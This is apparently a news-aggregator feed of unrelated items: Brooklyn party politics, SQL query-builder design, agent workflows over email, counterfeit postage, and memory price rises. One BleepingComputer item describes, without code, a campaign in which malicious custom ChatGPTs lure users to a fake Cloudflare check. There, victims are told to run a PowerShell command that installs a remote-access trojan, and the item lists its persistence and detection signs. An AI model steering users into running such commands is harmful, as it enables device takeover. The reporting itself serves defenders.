AI Skeptics: Government AI Procurement is a Problem (with Jae Kim and Aniket Kesari)

Math Babe
mathbabe.org
2026-09-28 10:07:30
We were visited by UNC Professor of Public Policy Jae Kim and Fordham Law Professor Aniket Kesari to talk about their study of AI procured by government agencies: Apple Spotify YouTube...
Original Article

Home > Uncategorized > AI Skeptics: Government AI Procurement is a Problem (with Jae Kim and Aniket Kesari)

We were visited by UNC Professor of Public Policy Jae Kim and Fordham Law Professor Aniket Kesari to talk about their study of AI procured by government agencies:

Apple

Spotify

YouTube

Categories: Uncategorized

Comments (0) Trackbacks (0) Leave a comment Trackback

  1. No comments yet.
  1. No trackbacks yet.

Leave a Reply

Your email address will not be published. Required fields are marked *

Rodneyse Bichotte Hermelyn Will Always Be the BK Dems Chair—In Our Hearts

hellgate
hellgatenyc.com
2026-09-29 17:07:55
As she leaves her post, here are the top five moments from her unforgettable tenure leading the Brooklyn Dems....
Original Article
Rodneyse Bichotte Hermelyn Will Always Be the BK Dems Chair—In Our Hearts
Bichotte Hermelyn highlighted a couple of "fake articles" in her farewell video. (Screengrab / Hell Gate)

Power

Scott's Picks:

Give us your email to read the full story

Sign up now for our free newsletters.

Sign up

Great! You’ve successfully signed up.

Welcome back! You've successfully signed in.

You've successfully subscribed to Hell Gate.

Your link has expired.

Success! Check your email for magic link to sign-in.

Success! Your billing info has been updated.

Your billing was not updated.

Custom ChatGPTs push ClickFix attacks to deploy RAT malware

Bleeping Computer
www.bleepingcomputer.com
2026-09-29 16:59:39
Custom variants of OpenAI's ChatGPT promoted in sponsored Google results are directing unsuspecting users to malicious sites that use ClickFix attacks to deliver malware. [...]...
Original Article

Custom ChatGPTs push ClickFix attacks to deploy RAT malware

Custom variants of OpenAI’s ChatGPT promoted in sponsored Google results are directing unsuspecting users to malicious sites that use ClickFix attacks to deliver malware.

The threat actor is abusing the legitimate feature in the AI platform that lets users create a version of ChatGPT tailored for a specific task that combines instructions, extra knowledge, and skills.

OpenAI hosts these custom GPTs, which can be published for others to install and use. The company plans to retire custom GPTs on December 11.

The malicious campaign was identified by Huntress, a managed detection and response (MDR) company, whose researchers say it affected dozens of users.

The threat actor named the malicious GPT model 'Plus 5.6' and configured it to direct users to an alleged backup site hosted on Google Sites.

The malicious GPT
The malicious custom GPT
Source: Huntress

However, the page shows a fake Cloudflare check and instructs visitors to run a PowerShell command, which deploys the infection chain.

Huntress researchers observed similar attacks in the past, which used deceptive ChatGPT conversations to launch ClickFix ruses and compromise targets, but using custom GPTs is a novel approach.

In both attacks, the malicious instructions are hosted on the legitimate ChatGPT.com domain, lending legitimacy to the operation and increasing the chances the victim will follow the instructions.

If executed locally, the provided PowerShell command installs a malicious MSI that launches a legitimate, signed application and a modified DLL loading the malware.

The payload used in this campaign is a remote access trojan (RAT) with capabilities for remote desktop access, audio and camera capture, file searches, host reconnaissance, and running additional payloads.

For persistence, the malware creates a new Run key in the Windows Registry and also a scheduled task, both named ‘Canon Configuration Reader.’

The attack chain
The attack chain
Source: Huntress

Huntress says it investigated at least 40 incidents connecting to the Google Sites page but confirmed that only two involved a custom GPT variant.

OpenAI took down the first GPT by September 25. Two days later, on September 27, the researchers found a second GPT linked to the same campaign, which was still active when they published their report.

More recent attacks switched from a Canon-signed host application to a Stardock-signed one and changed how it concealed and delivered the loader, although the payload remained the same.

Old and new attack schemes
Old and new attack kits
Source: Huntress

From the multi-stage attack chain, Huntress highlights phase 6, noting that the attackers built a custom encrypted file system to conceal the persistence script and RAT.

“Instead of one encrypted blob, it's a custom archive with its own folder tree, basically a homemade, encrypted zip file,” researchers say .

“It starts with a small header, followed by an index of 1,128 entries (one per file or folder, each recording its parent, its size and a per-file key), and then the file contents, packed back to back.”

Huntress says that most of the infection chain runs in memory or is supported by files that appear benign. This allows defenders to implement detections based on process activity monitoring.

The researchers provide a set of "detection opportunities" that include PowerShell pinging msiexec.exe to silently launch an MSI installer from  the temporary folder.

Additional signs of compromise refer to a signed app starting from an unusual folder under %LOCALAPPDATA%\Programs\, and a matching Run value and scheduled task that reappear if deleted.

article image

Build your security blueprint for AI-powered attacks

Join Mikko Hyppönen and security leaders from the NFL, CHANEL, and Atlassian for a two-hour digital summit on what AI-speed attacks change, what defenders should stop doing, and how to validate, decide, fix, and re-validate at machine speed.

Save your seat

Change Tours | Because understanding a code change is hard

Lobsters
hannahpotter.github.io
2026-09-29 16:57:11
Project available at https://github.com/hannahpotter/changetours-vscode-pull-request-github Comments...
Original Article

Change Tours

Developers spend a significant amount of their time reading and comprehending code that they did not write themselves, both in code editing and code review tasks. With recent developments and improvements to code generated by LLMs, this includes AI generated code as well as code written by other human developers.

Current systems offer insufficient support for code comprehension. Developers often have to rely on potentially outdated written documentation and only snapshot git histories of how and why a piece of code was developed. For pull requests, developers have little more information about a change than a set of diffs presented in alphabetical order according to the files the changes were made in. Pull requests may include a few comments, but have little support to guide a developer through the code change.

This points to the need for change tours, a guided interleaving of textual explanations with conceptually grouped related code changes to support code comprehension. This will support both editing and code review tasks for collaboratively edited code.

There are a lot of interesting directions to explore in this area! In particular, I am interested in questions like:

  • How can code tours be incorporated into the code review process?
  • How can code tours be incorporated into code base exploration (e.g., understanding a library)?
  • How can code tours be used to improve comprehension of AI generated code suggestions?

Two Kinds of SQL Query Builders

Lobsters
mechanicalrabbit.github.io
2026-09-29 16:47:03
Comments...
Original Article

The SQL language has a paradoxical fate. Although it was deliberately designed to appeal to a human user, nowadays most of SQL code is written—or rather generated—by the computer. Many computer programs need to query some database, and, for the vast majority of database servers, the only supported query language is SQL. But generating SQL is difficult because of the complicated and obscure rules of its quasi-English grammar (its original name SEQUEL stands for Structured English Query Language). For this reason, programs that interact with a database often use specialized libraries for generating SQL queries.

One of such libraries is FunSQL. FunSQL is designed with two goals in mind: supporting the full range of SQL's querying capabilities and exposing these capabilities in a compositional, data-oriented interface. This combination of goals makes FunSQL a perfect tool for data analysis in SQL and differentiates it from all the other query building libraries. Many query builders offer good coverage of SQL features, fewer provide data-oriented interface, but only FunSQL combines them in a single package.

And yet the difference between FunSQL and other query builders is not immediately apparent. In fact, the interfaces of various query building libraries seem almost identical. A query that finds 100 oldest male patients (in the OMOP CDM database) is assembled with FunSQL as follows:

From(:person) |>
Where(Get.gender_concept_id .== 8507) |>
Order(Get.year_of_birth) |>
Limit(100) |>
Select(Get.person_id)

The same query can be written in Ruby using Active Record Query Interface :

Person
.where("gender_concept_id = ?", 8507)
.order(:year_of_birth)
.limit(100)
.select(:person_id)

Or in PHP with Laravel's Query Builder :

DB::table('person')
->where('gender_concept_id', '=', 8507)
->orderBy('year_of_birth')
->limit(100)
->select('person_id')

In C#'s EF/LINQ :

Person
.Where(p => p.gender_concept_id == 8507)
.OrderBy(p => p.year_of_birth)
.Take(100)
.Select(p => new { person_id = p.person_id });

Or in R with dbplyr :

tbl(conn, "person") %>%
filter(gender_concept_id == 8507) %>%
arrange(year_of_birth) %>%
head(100) %>%
select(person_id)

In each of these code samples, the query is assembled using essentially the same interface. Stripped of its syntactic shell, the process of assembling the query can be visualized as a diagram of five processing nodes connected in a pipeline:

100 oldest male patients

It is precisely the fact that the query is progressively assembled using atomic, independent components that lets us call this interface compositional .

However we did claim that FunSQL differs from all the other query building libraries, and now apparently proved the opposite? As a matter of fact, there is a difference, even if it is not reflected in notation. To demonstrate this, let us rearrange this pipeline, moving the Order and the Limit nodes in front of Where .

100 oldest male patients ⟹ Males among 100 oldest patients

How does this rearrangement affect the output of the query? Perhaps unexpectedly, the answer depends on the library. With FunSQL, as well as EF/LINQ and dbplyr, it changes the output from 100 oldest male patients to the males among 100 oldest patients . But not so with the other two libraries, Active Record and Laravel, where rearranging the pipeline has no effect on the output.

To summarize, the following query builders are sensitive to the order of the pipeline nodes:

  • FunSQL
  • EF/LINQ
  • dbplyr

And the following are not:

  • Active Record
  • Laravel

These are the two kinds of query builders from this article's title. But how can these libraries act so differently while sharing the same interface? To answer this question, we need to focus on what is only implicitly present on the pipeline diagram: the information that is processed by the pipeline nodes.

"Where" node

A node with one incoming and one outgoing arrow symbolizes a processing unit that takes the input data, transforms it, and emits the output data. While the character of the data is not revealed, it is tempting to assume it to be the tabular data extracted from the database.

"Where" node acting on data

But this can't be right, at least not literally, because a SQL query builder cannot read the data in the database. Instead, the query builder generates a SQL query:

SELECT "person_1"."person_id"
FROM "person" AS "person_1"
WHERE ("person_1"."gender_concept_id" = 8507)
ORDER BY "person_1"."year_of_birth"
LIMIT 100

But if we assume for a moment that pipeline nodes could process the data directly, we would expect that both the pipeline and the corresponding SQL query produce the same output. In other words, the role of the pipeline is to specify the expected output of the SQL query. This is how pipeline nodes are interpreted by FunSQL and the other two libraries, EF/LINQ and dbplyr. We can call such query builders data-oriented .

The conversion of the pipeline to SQL is not always that straightforward. Even though we could freely reorder the nodes in a pipeline, we cannot do the same to the clauses in a SQL query. This is because the SQL grammar arranges the clauses in a rigid order:

  1. FROM , followed by zero, one or more
  2. JOIN , followed by
  3. WHERE , followed by
  4. GROUP BY , followed by
  5. HAVING , followed by
  6. ORDER BY , followed by
  7. LIMIT , followed by
  8. SELECT , written at the top of the query, but the last one to perform.

This order is compatible with the first pipeline, in which the Where node is followed by Order and Limit , but not the second pipeline, where these nodes change their relative positions. So how could the second pipeline be converted to SQL? We would be out of options if we were still using the original SQL standard, SQL-86, but the next revision of the language, SQL-92, recognized this limitation. Regrettably, it did not relax this rigid clause order. Instead, SQL-92 introduced a workaround: a query can be extended by nesting it into the next query's FROM clause. This gives us a method for converting an arbitrary pipeline into SQL: break the pipeline into smaller chunks that comply with the SQL clause order, convert each chunk into a SQL query, and then nest all these queries together:

SELECT "person_2"."person_id"
FROM (
  SELECT
    "person_1"."person_id",
    "person_1"."gender_concept_id"
  FROM "person" AS "person_1"
  ORDER BY "person_1"."year_of_birth"
  LIMIT 100
) AS "person_2"
WHERE ("person_2"."gender_concept_id" = 8507)

The SQL grammar has a number of deficiencies, including rigid clause order, query nesting, and nonsensical position of the SELECT clause. The position of SELECT violates the execution flow of the query, and this violation is aggravated by query nesting. Complex SQL queries often require multiple levels of nesting, which makes such queries bloated and difficult to interpret. This is where data-oriented query builders, which do not constrain the order of pipeline nodes, offer an improvement over plain SQL.

What about the other kind of query builders? Active Record and Laravel employ a pipeline of exactly the same form, but because it is not sensitive to the order of the nodes, it must work on a different principle. Indeed, this pipeline generates a SQL query by incrementally assembling the SQL syntax tree. Because of the rigid clause order, a SQL syntax tree can be faithfully represented as a composite data structure with slots specifying the content of the SELECT , FROM , WHERE , and the other clauses:

struct SQLQuery
    select
    from
    joins
    where
    groupby
    having
    orderby
    limit
end

Individual slots of this structure are populated by the corresponding pipeline nodes.

"Where" node acting on the syntax tree

This explains why the pipeline is insensitive to the order of the nodes. Indeed, as long as the content of the slots stays the same, it makes no difference in what order the slots are populated.

Pipeline is insensitive to the order of the nodes

This method of incrementally constructing a composite structure is known as the builder pattern . We can call the query builders that employ this pattern syntax-oriented .

Both data-oriented and syntax-oriented query builders are compositional: the difference is in the nature of the information processed by the units of composition. Data-oriented query builders incrementally refine the query output; syntax-oriented query builders incrementally assemble the SQL syntax tree. Their interfaces look almost identical, but their methods of operation are fundamentally different.

But which one is better? Syntax-oriented query builders have two definite advantages: they are easy to implement and they could support the full range of SQL features. Indeed, the interface of a syntax-oriented query builder is just a collection of builders for the SQL syntax tree. How complete the representation of the syntax tree determines how well various SQL features are supported.

On the other hand, syntax-oriented query builders are harder to use . As they directly represent the SQL grammar, they inherit all of its deficiencies. In particular, the rigid clause order makes it difficult to assemble complex data processing pipelines, especially when the arrangement of pipeline nodes is not predetermined.

A data-oriented query builder directly represents data processing nodes, which makes assembling data processing pipelines much more straightforward—as long as we can find the necessary nodes among those offered by the builder. But where does the builder get its collection of data processing nodes? And how can we tell if this collection is complete?

One way to implement a data-oriented query builder is to adapt a general-purpose query framework. Indeed, this is the origin of EF/LINQ, which is adapted from LINQ , and dbplyr, which is adapted from dplyr . The query framework determines what processing nodes are available and how they operate. In principle, any query framework could be adapted to SQL databases by introducing just one new node, a node that loads the content of a database table. If we place this node at the beginning of a pipeline and make the rest of it out of regular nodes, we obtain a pipeline that processes data from a SQL database. However, this pipeline will be very inefficient compared to a SQL engine, which can use indexes to avoid loading the entire table into memory and thus can process the same data much faster. This is why EF/LINQ and dbplyr generate a SQL query that replaces the pipeline as a whole. The pipeline itself no longer runs directly, but now serves as a specification, with the assumption that if it were to run, it would produce the same output as the SQL query. This method of transforming a general-purpose query framework to a SQL query builder is called SQL pushdown .

However, SQL pushdown has a serious limitation. A general-purpose query framework is not designed with SQL compatibility in mind. For this reason, some of the pipelines assembled within this framework cannot be converted to SQL. Even worse, many useful SQL queries have no equivalent pipelines and thus cannot be generated using SQL pushdown. Indeed, SQL accumulated a wide range of features and capabilities since it first appeared in 1974. The first revision of the SQL standard, SQL-86, already supported Cartesian products, filtering, grouping, aggregation, and correlated subqueries. The next revision, SQL-92, added many join types and introduced query nesting. SQL:1999 greatly expanded its analytical capabilities by adding two types of queries: recursive queries, for processing hierarchical data, and data cube queries, which generalize histograms, cross-tabulations, roll-ups, drill-downs, and sub-totals. The follow-up revision, SQL:2003, added support for aggregate functions over a running window. Admittedly, SQL is a quintessential enterprise abomination , a hodgepodge of features added to support every imaginable use case, but with inadequate syntax, weird gaps in functionality, and no regards to internal consistency. Nevertheless, the breadth of SQL's capabilities has not been matched by any other query framework, including LINQ or dplyr. So when we generate SQL queries using EF/LINQ or dbplyr, a large subset of these capabilities remains inaccessible.

FunSQL is a data-oriented query builder created specifically to expose full expressive power of SQL. Unlike EF/LINQ and dbplyr, FunSQL was not adapted from an existing query framework, but was carefully designed from scratch to match SQL's capabilities. These capabilities include, for example, support for correlated subqueries and lateral joins (with Bind node), aggregate and window functions (using Group and Partition nodes), as well as recursive queries (with Iterate node). This comprehensive support for SQL capabilities makes FunSQL the only SQL query builder suitable for assembling complex data processing pipelines. Moreover, even though FunSQL pipelines cannot be run directly, every FunSQL node has a well-defined data processing semantics, which means that, in principle, FunSQL could be developed into a full-blown query framework. This potentially opens a path for replacing SQL with an equally powerful, but a more coherent and expressive query language.

Judges Rule Brooklyn Dems 'Power Grab' Was Illegal—Again

hellgate
hellgatenyc.com
2026-09-29 16:33:01
The reformists really might have it now… Unless?...
Original Article

The day after Brooklyn Democratic Party Chair Rodneyse Bichotte Hermelyn announced she's not seeking reelection, a state appeals court dealt her legacy another blow.

The panel of judges deemed Bichotte Hermelyn's last-minute "power grab" rules illegal once more, all but sinking her allies' chances of clawing back control of the party.

The judges dropped their decision Tuesday afternoon, just hours before the party was set to meet and vote on a new chair. They found that Bichotte Hermelyn's new rules are "invalid" according to the party's own bylaws, agreeing with Brooklyn state Supreme Court Judge Jill Epstein , who earlier ruled the "power grab" rules were illegal because they were voted in by outgoing district leaders who lost their elections.

"The Supreme Court properly determined that under the Party Rules, outgoing members of the Executive Committee were not authorized to vote in the special meeting, and accordingly, the amendments that passed on August 25, 2026, are invalid," the judges wrote.

As a result, the reformist bloc of the party is now closer than ever to wresting power from the old guard and electing their chosen new chair: Julio Peña III.

"The appellate division upheld small-d democracy in our party, reaffirmed the will of the voters, and I look forward to governing with integrity, transparency, and inclusiveness," Peña III told Hell Gate in a text Tuesday afternoon.

Julio Peña III (Hell Gate)

Give us your email to read the full story

Sign up now for our free newsletters.

Sign up

The Shell & Email

Lobsters
www.machtiani.chat
2026-09-29 16:14:41
Comments...
Original Article

Is email the best way to work when working with multiple agents at the same time? Each email thread is a session. And it supports group conversations.

See what I built on Github .

With email. you’re not chained to a single company’s app or, even, your laptop. You can do it anywhere and email is the most versatile in poor network conditions, on top of that.

Email already solves the problem for working with people in an asynchronous and distributed way. Large language models get this, like they get the shell.

Background

We like the shell and the terminal that let’s us use it. And for practical reasons. The shell composes and enables interoperability with other applications without a gatekeeper. Once you get the hang of it, using the terminal is fun and liberating.

There is no coincidence that LLMs are most useful to us when harnessed to the shell. And if we need to work very closely with an agent, doing so from the terminal is best so we can be as close to the shell as possible.

I’m thankful for that. We mostly use Claude Code, Codex CLI, and others, such as OpenCode that uses the shell and are worked with by us on the terminal (uses the shell). We don’t have to use an iPhone App or some cloud based web app by a single company to use a computer productively.

However, there are clearly limitations when you must work with many agents. It’s dizzying. We often need to work asynchronously with agents working on different things. Stop. Do something else. Live life. Check on it a bit. Return to it easily on our own time, etc.

Again, email already solves the problem for working with people in an asynchronous and distributed way. That translates well when working with agents, and even other people and agents.

How I got here

After the first release of Machtiani over a year ago, I began feeding Machtiani’s answers back into its next instructions. I didn’t release until now to pursue this. An iterative instructions loop that drove a worker that is lightweight supervisor.

That lightweight supervisor can work with any agents already installed on your computer.

I found email be the most natural and liberating way to work with others and agents together.

See Machtiani on GitHub .

—David

FBI tells ShinyHunters members to turn themselves in after recent arrest

Bleeping Computer
www.bleepingcomputer.com
2026-09-29 16:09:55
The FBI is warning members of the ShinyHunters extortion group to turn themselves in after Dutch police arrested a man the bureau described as one of the group's alleged leaders. [...]...
Original Article

We apologize for the temporary outage. The administrators have been notified and the problem should be rectified soon.

Please refresh this page again shortly.

U.S. postal inspectors shut down website selling counterfeit postage labels

Hacker News
postalemployeenetwork.com
2026-09-29 15:30:17
Comments...
Original Article

Miami, FL – 9/24/26 – The U.S. Postal Inspection Service and partner federal agencies have seized an internet domain, charging a Pakistani national with operating an unauthorized website that allegedly sold more than 5 million counterfeit U.S. Postal Service (USPS) postage labels, resulting in more than $126 million in losses.

Court records show Faheem Akram, 33, of Khanewal, Pakistan, operated LabelsBank.com, a website that allegedly sold counterfeit USPS postage at a fixed rate, typically charging $2 per label, regardless of the package’s weight, size, or destination. LabelsBank.com was not authorized to sell USPS products and services. The counterfeit labels allowed customers to ship packages at deeply discounted prices, resulting in a substantial loss in revenue to USPS for shipping services rendered.

Postal inspectors from the Miami Division of the Postal Inspection Service found more than 5,000 customers used LabelsBank.com to purchase more than 5.1 million counterfeit shipping labels. In conjunction with Akram’s indictment, a court order was issued authorizing the domain seizure and shutdown of the website.

Akram is charged with one count of conspiracy to defraud the United States and to make and sell counterfeit postage stamps, five counts of making and selling counterfeit postage stamp labels, and four counts of wire fraud. It is important to note that criminal charges are only allegations, and every defendant is presumed innocent unless or until proven guilty.

“Our reach goes beyond our borders,” said Miami Division Postal Inspector in Charge Bladismir Rojo. “If you are defrauding the Postal Service and targeting U.S consumers by pushing phony postage, we will find you and bring you to justice.”

“The alleged scheme was simple but massive: sell counterfeit postage online at fixed, cut-rate prices, as little as $2 per label, regardless of a package’s weight, size, or destination, enabling customers to avoid legitimate Postal Service charges,” said U.S. Attorney Jason A. Reding Quiñones for the Southern District of Florida. “The indictment alleges more than 5.1 million counterfeit labels and more than $126 million in losses. Through the work of the U.S. Postal Inspection Service and our prosecutors, the website has been shut down, the domain seized, and federal charges brought against its alleged operator, a Pakistani national.”

LEARN MORE ABOUT COUNTERFEIT POSTAGE

Memory Companies Have Destroyed the Consumer Market

Hacker News
gamersnexus.net
2026-09-29 15:27:41
Comments...
Original Article

 Memory Companies Have Destroyed the Consumer Market

The cyclical nature of memory manufacturing may finally be broken -- and not in a good way for consumers

The Highlights

  • The memory manufacturers have all moved toward long-term agreements with longer terms and capacity than previously
  • Amazon has publicly stated that more users than ever will consider its cloud services due to the rising costs of on-location hardware
  • Micron, Samsung, and SK Hynix have diverted a flood of memory away from consumers
Grab a GN15 Large Anti-Static Modmat to celebrate our 15th Anniversary and for a high-quality PC building work surface. The Modmat features useful PC building diagrams and is anti-static conductive. Purchases directly fund our work! (or consider a direct donation or a Patreon contribution !)

Intro

The DRAM and NAND flash manufacturers at fault for the ongoing RAM, SSD, and GPU price increases have finally figured out how to suppress the market’s previously cyclical pricing nature, and it’s by committing to larger, longer long-term agreements with fewer customers. This article deep dives into what these companies are saying out loud -- like Amazon’s interest in pushing more customers into cloud services from on-premises -- and also SSD and RAM pricing.

Editor's note: This was originally published on September 21, 2026 as a video. This content has been adapted to written format for this article and is unchanged from the original publication.


Credits


Host, Writing

Steve Burke

Video Editing

Vitalii Makhnovets
Tim Phetdara

Writing

Tannen Williams

Writing, Web Editing

Jimmy Thang


Since last September, the average price of SSDs and RAM have continued to climb: prices have increased by 137% for 2 TB NVMe SSDs on average, 183% for 2 TB SATA SSDs, 363% for 32GB DDR5 kits, and 294% for 32GB DDR4 kits, with AVG prices collected from the samples of product listings specified below the chart.

In some situations, it’s worse: DDR5-6000 64GB kits have climbed from $240 to $1,300-$1,400 on average, an increase of around 483%.

If you had dreams of a home server or a high-end engineering design or editing machine with 128GB of memory, that’s gone up even more.

We bought 128 GB of DDR5-6400 GSkill ECC Registered memory in 2024 for $1,060 to use in an editing machine.

Today, that RAM isn’t even available .

If you bought similar RAM, you could get scalped by a third-party seller for some NEMIX 128GB of a similar spec for $6,800, or maybe you’d prefer 512GB -- something that used to cost $4,200 -- for $23,811.

And 99 cents, because fuck you.

In 2024, we also bought a 4 TB Samsung 990 Pro for $390. Today, that same drive is $1,100 , or a 254% increase.

This is the K-shaped economy. From a single stick of 16 GB to a few sticks totaling 128 GB, everyone is getting ripped-off. People who want to play games for a hobby are robbed and people who want to start a business that needs a high-end computer might find it cheaper to rent a system or use cloud computing, which sort of seems like the endgame.

This massive diversion to data centers isn’t just affecting RAM and SSD prices for PC enthusiasts – it’s affecting the prices of all consumer electronics for literally everybody .

According to the IDC:

“ Worldwide smartphone shipments will fall 16.7% in 2026, [...] The average selling price of a smartphone will reach $581 in 2026, up 27.6% in a single year .”

After Apple increased prices on its MacBook Neo, MacBook Air, MacBook Pro, Mac Studio, iPad, iPad Air, iPad Pro, iPad Mini, HomePod, HomePod Mini, Apple TV Box, and Vision Pro headset, Apple’s Tim Apple noted in his final earnings call as CEO , “We reluctantly raised prices I would say and we did it because we’re in what I would characterize as a 100-year flood on the memory pricing with exponential increases in memory prices.”

XBOX recently announced its latest round of price increases , stating, “Effective August 1, 2026, we will be updating prices worldwide. The price of XBOX consoles will increase by US$100 for 512 GB models and US$150 for 1 TB models. We will also be sunsetting our 2 TB model.” The company added, “Unfortunately, console storage and memory prices have increased by more than 2.5x and we expect another doubling by the fall of 2027.”

Amazon raised prices on its Echo Dot, Echo Show 11, Kindle, Kindle Paperwhite, Fire TV Stick HD, Fire TV Stick 4K Max, eero 7, and eero Pro 7.

Nintendo inflated its Switch 2 MSRP , and Sony’s already increased its PS5 prices twice within the last year.

TechInsights CSO, reported via the New York Times, added , “Yes, the prices of your iPhone are going up. But it’s also possible the prices of your M.R.I. machines may go up, or worse than that, that M.R.I. machine may not get made.”

Meanwhile, Chinese newcomers CXMT and YMTC have continued their rapid expansions, with YMTC breaking into the global top 3 NAND manufacturers by shipments , surpassing Kioxia, Micron, and SanDisk, and CXMT now holding 10% of the global DRAM market share by revenue , up 6 percentage points YoY, as reported by Counterpoint Research.

And yet being challenged by the United States Government for entrance, despite selling consumer-grade memory.

To us, the most concerning part of this is that the memory suppliers are trying to finally bust the cyclical nature of memory pricing, which would mean they want to eliminate the future low point for prices, especially for consumers.

Overview

Long-Term Agreements (LTAs) are made between memory manufacturers and large clients, often unnamed. These clients almost certainly include NVIDIA.

Shortages caused by AI demand could keep supply just tight enough to maintain the currently inflated RAM and SSD prices for years to come .

Throughout the past year, all major manufacturers altered their customer relationship strategies , now forming 3-5 year long-term agreements (or LTAs) with, and allocating 50 - 70% of their outputs to only their largest 5-16 customers .

Some form of agreements have been in place with major customers since, basically, the dawn of time -- but the capacity allocated to them and the duration are concerning.

Chosun Daily explains :

“LTAs are transforming the industry from a 3–5-year boom-bust cycle into a long-term order-based model with pre-secured demand.”

In other words, the manufacturers went from prioritizing enterprises over consumers to now prioritizing their 10 largest companies over everybody.

In fact, thanks to all the major cloud service providers and hyperscalers buying up all the supply and sending prices skyrocketing, smaller businesses can no longer afford on-site server upgrades , forcing them to rent cloud infrastructure instead.

Fortunately for the hyperscalers, JP Morgan notes , “While LTAs may help keep costs manageable for hyperscalers, they dramatically decrease the flexibility of memory fabricators to address demand for memory chips in consumer goods.”

LTAs Restructuring Market Dynamics

Starting with the long-term agreements, we can look to each of the manufacturers’ latest earnings reports:

Micron reported that its 16 LTAs currently represent 20% of its DRAM and a third of its NAND supply, noting , “When completed, we expect approximately half or more of our company revenue to be under these SCAs with customers across end markets.”

SanDisk , whose Datacenter and Edge revenue increased by 1,298% and 392% YoY while revenue for its consumer segment decreased by 5% YoY, reported that it’s allocating 50% of its bit output in 2027 and 67% of its bit output in 2028 to LTAs.

Kioxia claimed :

“We are on track toward our 50% LTA volume coverage for calendar year 28 with key customers.”

In an earnings call, Samsung stated , “We have already finalized agreements with the top five global data center customers, [and] are also in the final stages of talks with five additional major accounts to support their AI-related demand.” The company added , “We intend to maintain flexibility in supply allocation and plan to allocate approximately 60% to 70% of our total capacity to long-term supply contracts while preserving sufficient capacity to support customers without multi-year contracts.”

And Western Digital’s CEO affirmed, stating , “The last time we reported on LTAs, we talked about having one LTA of a large customer all the way up to calendar year '29. But we're very much in the throes of discussions with customers to establish LTAs for calendar '29, '30 and '31 as well. So visibility remains very strong, customer-driven demand for LTAs extending all the way out to '31 remains very strong.”

As for the effects: our understanding is that these long-term agreements will fundamentally alter the way the memory market works for consumers and everyone else. The Korea Herald explains this :

“The shift marks a departure from an industry long dominated by quarterly negotiations and short-term orders, potentially softening the boom-and-bust cycle that has defined the memory business for decades.”

Samsung reiterated this in its latest earnings call, stating , “Historically, the memory industry has experienced recurring cycles of upturns and downturns driven by demand fluctuations in consumer-oriented applications. However, by increasing the share of longer-term backlog-driven business, we hope to significantly enhance the stability and visibility of our business.”

And Samsung’s not alone – all manufacturers are echoing the same “ enhanced visibility ” phrase in some manner or another.

One industry analyst, reported via The Korea Herald, asserted :

"LTAs are unlikely to eliminate the memory cycle, but they could reduce earnings volatility by locking in demand for longer periods. How effective they are will depend on how the contracts hold up in the next downturn.”

LTA Customers

Buy a GN 4-Pack of PC-themed 3D Coasters ! These high-quality, durable, flexible coasters ship in a pack of 4, each with a fully custom design made by GN's team. You'll get a motherboard-themed coaster with debug display & reset buttons, a SATA SSD with to-scale connectors, RAM sticks, and a GN logo. These fund our web work! Buy here .

Amidst the height of the shortage, demand from cloud providers continued to increase:

TrendForce anticipates CapEx for the world’s nine major CSPs to increase from $922 billion in 2026 to $1.383 trillion in 2027, explaining :

“The rapid increase will be driven in part by soaring memory contract prices and robust procurement demand. TrendForce estimates that DRAM and NAND Flash combined will account for 47% of CSPs’ total CapEx in 2026, with their share rising further to 68% in 2027.”

Based on TrendForce’s figures, that’d put the nine largest CSPs’ CapEx spending on only DRAM and NAND at an estimated $433 billion in 2026 and an estimated $940 billion in 2027.

Luckily for the CSPs, after driving up RAM and SSD prices, smaller businesses couldn’t afford on-site server upgrades, forcing them to rent cloud infrastructure from the CSPs instead .

Amazon’s CEO described the new dynamic in its 1Q ‘26 earnings report, explaining , "One of the interesting things that we see right now with the change in price and supply on things like memory is that it is a further impetus pushing companies who have on-premises infrastructure into the cloud.” He added, “We have seen a number of conversations we have been having with enterprises for many months [...] accelerate rapidly just because we have a lot more supply than what others have. It will be interesting to see how that evolves over time.”

That’s it. That’s the quiet part out loud, and the part we’ve all been saying: Amazon, the owners of one of the world’s cloud infrastructure providers via AWS, is saying that this is pushing companies into the cloud. That’s not going to stop at companies.

And the CSPs are already seeing the results. In their latest filings:

Google Cloud’s revenue increased 82% YoY , Microsoft’s “ Azure and other cloud services revenue” increased 43% YoY , and AWS sales increased 36.7% YoY, which Amazon notes is its “fastest growth in 18 quarters .”

Breakdown by End Application

For further reference: In TrendForce’s “Forecast Breakdown of NAND Flash Bit Demand by End Application, 2026-2027” chart , the firm projects NAND bit demand for server applications to increase from 44.2% in 2026 to 51.1% in 2027 while % of total bit demand for PC, mobile, game console, and other applications will each moderately decrease.

In comparison, TrendForce expects DRAM’s bit demand from graphic and server applications to increase by 1.7 and 1.5 percentage points, reallocating % of total bit demand away from PC, mobile, and consumer applications.

While NAND is primarily only affected by increased server consumption, DRAM is heavily affected by increased graphic consumption in addition to increased server consumption, as manufacturers prioritize HBM.

Based on TrendForce’s projections, PC applications will account for 5.6% of DRAM bit demand and 11.5% of NAND bit demand in 2027.

Compared to TrendForce’s 2019 numbers , the % of total DRAM consumption for server applications is projected to increase by 13.2 percentage points, and projected to decrease by 7.1 percentage points for PC applications.

As for how this all affects the consumer market: I think we all know...

This chart compares AVG prices from September 2025 to AVG prices currently. We collected each entry’s AVG prices from a sample of individual product listings that we found complete price histories for on PC Part Picker, as specified below the chart.

Based on our samples and since last September:

AVG prices for 2 TB NVMe SSDs increased by nearly $200, from $143.25 to $340.

AVG prices for 2 TB SATA SSDs shot up 183%, from $112.33 to $317.67. This is likely aided in some capacity by less production of SATA SSDs.

AVG prices for 32GB DDR5-6000 CL30 kits skyrocketed by an insane $445, or 363%, increasing from $122.50 to $567.50.

Finally, AVG prices for 32GB DDR4 kits surged from $61.50 to $242.50 currently, or by 294%.

While all prices increased significantly within the last year, RAM appears to have undergone steeper % increases. Part of this, we’d assume, is because, unlike NAND supply which is primarily reallocated to server applications, DRAM supply is getting hit on both ends , reallocating supply to both server applications and HBM for graphics cards and accelerators.

HDD Price Comparison

For additional comparison, PC Part Picker’s price trends chart for a 16TB hard drive illustrates how its AVG price increased by nearly 129% in the same period, from roughly $350 in September 2025 to around $800 currently, with price increases really beginning to accelerate in April 2026.

Spot Price History | Session Averages | GamersNexus

Here, we’ll take a look at spot prices. While spot prices aren’t representative of the contract prices most major OEMs actually pay, they are indicative of demand.

This chart plots the spot price session AVGs for 16Gb DDR5, 512Gb TLC wafer, and 16Gb DDR4, which we collected from saved dramexchange webpages accessed via archive.org’s Wayback Machine .

